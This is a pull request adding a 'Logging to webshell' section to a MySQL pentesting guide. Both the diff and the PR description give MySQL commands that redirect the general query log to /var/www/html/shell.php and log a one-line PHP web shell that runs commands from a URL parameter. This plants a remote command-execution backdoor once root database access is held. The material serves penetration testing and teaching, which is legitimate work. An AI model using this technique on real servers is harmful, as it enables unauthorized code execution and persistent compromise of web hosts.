### PR TITLE
Update pentesting-mysql.md

### DIFF
--- a/network-services-pentesting/pentesting-mysql.md
+++ b/network-services-pentesting/pentesting-mysql.md
@@ -241,6 +241,29 @@ You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting 
 
 ![](<../.gitbook/assets/image (277).png>)
 
+### Logging to webshell
+
+When you obtain a root account, You can enable **general_log** to logging your command out to file. For example, the php webshell.
+
+```mysql
+# Check if the current environment is enabled or not.
+SHOW VARIABLES LIKE '%general_log%'
+
+# Enable logging
+SET GLOBAL general_log = "ON"
+
+# Set the logging output file
+SET GLOBAL general_log_file="/var/www/html/shell.php"
+
+# Then all the commands you type will be recorded in the log file.
+SELECT '<?php system($_GET["cmd"]);?>';
+
+# disable logging
+set global general_log = off;
+
+```
+
+Reference: [The General Query Log](https://dev.mysql.com/doc/refman/8.0/en/query-log.html)
 
 
 ### Useful files


### PR DESCRIPTION
Here is using general_log_file get webshell.

### Logging to webshell

When you obtain a root account, You can enable **general_log** to logging your command out to file. For example, the php webshell.

```mysql
# Check if the current environment is enabled or not.
SHOW VARIABLES LIKE '%general_log%'

# Enable logging
SET GLOBAL general_log = "ON"

# Set the logging output file
SET GLOBAL general_log_file="/var/www/html/shell.php"

# Then all the commands you type will be recorded in the log file.
SELECT '<?php system($_GET["cmd"]);?>';

# disable logging
set global general_log = off;

```

Reference: [The General Query Log](https://dev.mysql.com/doc/refman/8.0/en/query-log.html)